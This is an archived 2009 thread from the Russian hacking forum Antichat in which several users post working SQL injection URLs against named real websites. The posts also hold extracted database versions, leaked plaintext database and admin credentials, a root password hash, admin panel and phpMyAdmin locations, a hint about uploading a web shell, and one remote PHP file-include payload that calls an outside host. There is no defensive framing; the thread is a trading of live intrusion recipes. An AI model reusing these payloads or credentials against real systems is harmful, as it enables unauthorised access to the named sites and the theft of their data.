ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.03.2009, 05:13
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Куяк!
http://www.ricosrl.ro
Крутится на 4м мускуле. Хитрый администратор сдул подчистую эту партию.
Дыра:
http://www.ricosrl.ro/lucrari/lucrare.php?lucrare=-1+union+select+concat_ws(0x3a3a,User,password,user ()),2,3+from+mysql.user/*
Таблицы не подбрутились, но чудо-юзер имеет FILE_PRIV = YES. Порывшись в скриптах, находим конфиг и в нем:
define('_HOST','localhost');
define('_USER','root');
define('_PASS','rico1991');
define('_DATABASE','photon_rico');
Детально изучив файлы отвечающие за аутентификацию - видим, что логин жестко забит в скрипте, а именно:
login: user
Пароль же берется от регов указанных в конфиге к БД:
pass: rico1991
http://www.ricosrl.ro/administrare/ <- сама админка
Но админка беспонтовая и шелл через нее не залить, поэтому смотрим дальше.
http://www.ricosrl.ro/admin/ <- лежит пхпмайадмин
Берем реги из конфига и коннектимся.
Как залить шелл далее понятно =)
|
|
|
06.03.2009, 05:34
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
бедный сайт( мне его жалко(( Что с ним будет...
|
|
|
|
06.03.2009, 11:47
|
|
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572
Репутация:
34
|
|
travel.chinavista.com pr 5
Код:
http://travel.chinavista.com/show_culture.php?id=-7%20union%20select%201,concat_ws(0x23,database(),user(),version()),3,4,5,6,7
entravel#dedop@localhost#5.0.45
adminka
http://travel.chinavista.com/admin/ basic
memberka
http://travel.chinavista.com/guide-login.php
www.colinst.com pr 5
Код:
http://www.colinst.com/brief.php?id=-6%20union%20select%201,2,3,4,5,concat_ws(0x23,database(),user(),version())
colinsttest#root@localhost#5.0.67
http://www.colinst.com/admin/
root#*9F65C210660F2E3F11A0BCDA6F368888B00A97C7
|
|
|
|
06.03.2009, 13:09
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.antichitati.ro/oferta_produse.php?ID=-4'+union+select+1,2,3,4,concat_Ws(0x3a,version(),d atabase(),user()),6,7/*
Database Version: 4.1.20-log
Database name: antichitati
User name: antichitati@localhost
|
|
|
|
06.03.2009, 13:17
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
www.ukrtexzbut.com.ua
Код:
http://www.ukrtexzbut.com.ua/index.php?page=200%27&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--%20&tovar=7_16
version: 5.0.67-community-log
user: ukrtexzb_scalibu@localhost
database: ukrtexzb_poshyk
|
|
|
|
06.03.2009, 13:23
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Pagerank: 4
тИЦ: 300
Код:
http://www.giacint.ru/inside.php?action=price&pid=4265&id=4274+union+select+1,2,3,concat_ws(0x3a,version(),databas e(),user( )),5,6,7,8,9,10,11,12,13,14--
Database Version : 5.0.75
Database name : giacintf_f
User name : giacintf_f@localhost
юзвери выводятся без лимита, но админа я там не нашел  :
Код:
http://www.giacint.ru/inside.php?action=price&pid=4265&id=4274+union+select+1,2,3,concat_ws(0x3a,nik,pwd,email),5,6,7,8,9,10,11,12,13,14+from+gia _otzivusers--
админка, вдруг пригодится:
Код:
http://www.giacint.ru/cpanel/
|
|
|
|
06.03.2009, 15:20
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Код:
http://www.chapalain.li/sNews/index.php?id=-31+union+select+1,version(),3,4,5,6,7,8,9,10,11--
Код:
http://www.944.li/gaestebuch/kommentar.php?id=-85+union+select+1,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15--
Вроде 5-я версия MySQL, а вот таблицы выводить не хочет(( |
|
|
|
06.03.2009, 16:00
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://www.hdip.com.pk/index.php?id=-1+union+all+select+0,1,concat_ws(0x3a,id,login,password),3,4+from+admin--
ид/логин/пасс:
Код:
http://www.hdip.com.pk/index.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user()%20,database()),3,4--
юзер/версия/бд:
Код:
5.0.51a-community-log:hdipdb@72.51.46.233:hdip
-------------------------------------------------------------------
The End! |
|
|
|
06.03.2009, 17:57
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
www.akusherstvo.ru Pr-5 ТиЦ 2700
PHP код:
http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=212321+union+select+concat_ws(0x3A,user(),version(),database()),2--+
user:jakAkush@localhost
version:5.0.32-Debian_7etch8
database:jakza_akush
PHP код:
http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=212321+union+select+concat_ws(0x3A,admin_login,admin_pass),2+from+jakza_akush.admin--+
jak : pak
www.shogunclub.ru ТиЦ-300 SQL injection+php include
PHP код:
http://www.shogunclub.ru/kendo.php?ArticleID=-312317+union+select+1,2,3,4,5,6,0x687474703a2f2f73686172612d64612e6d6f792e73752f696e636c7564652e696e63,8,9,10--+
Последний раз редактировалось AkyHa_MaTaTa; 06.03.2009 в 19:21..
|
|
|
|
06.03.2009, 18:03
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
http://f-online.ru/newsr.php?id=-1+union+select+1,2,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),4+--+
fairytal_results@localhost:fairytal_results:5.0.51 a-community
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
